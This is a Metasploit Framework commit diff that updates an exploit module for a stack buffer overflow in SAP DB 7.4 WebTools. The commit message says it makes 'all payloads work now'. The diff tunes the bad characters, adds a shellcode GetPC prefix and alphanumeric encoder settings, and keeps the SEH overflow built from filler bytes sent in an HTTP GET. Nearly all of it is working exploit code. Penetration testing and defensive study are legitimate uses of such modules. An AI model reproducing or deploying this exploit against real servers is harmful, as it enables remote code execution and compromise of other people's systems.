updated due to reliability. all payloads work now.

git-svn-id: file:///home/svn/framework3/trunk@9814 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/http/sapdb_webtools.rb

@@ -23,9 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.
 				By sending an overly long GET request, it may be possible for
-				an attacker to execute arbitrary code. Using the PAYLOAD of
-				windows/shell_bind_tcp or windows/shell_reverse_tcp allows
-				for the most reliable results.
+				an attacker to execute arbitrary code. 
 			},
 			'Author'         => [ 'MC' ],
 			'License'        => MSF_LICENSE,
@@ -44,10 +42,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'Space'    => 850,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
+					'BadChars' => "\x00",
+					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
 					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-
+					'EncoderOptions' =>
+						{
+							'BufferRegister' => 'ECX',
+						},
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
@@ -61,11 +62,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		c = connect
 
 		filler = rand_text_alphanumeric(20774)
 		seh = generate_seh_payload(target.ret)
-		# pretty big...
+		
 		sploit = filler + seh + rand_text_alphanumeric(3000)
 
 		print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
@@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		}, 5)
 
 		handler
+
 	end
 
 end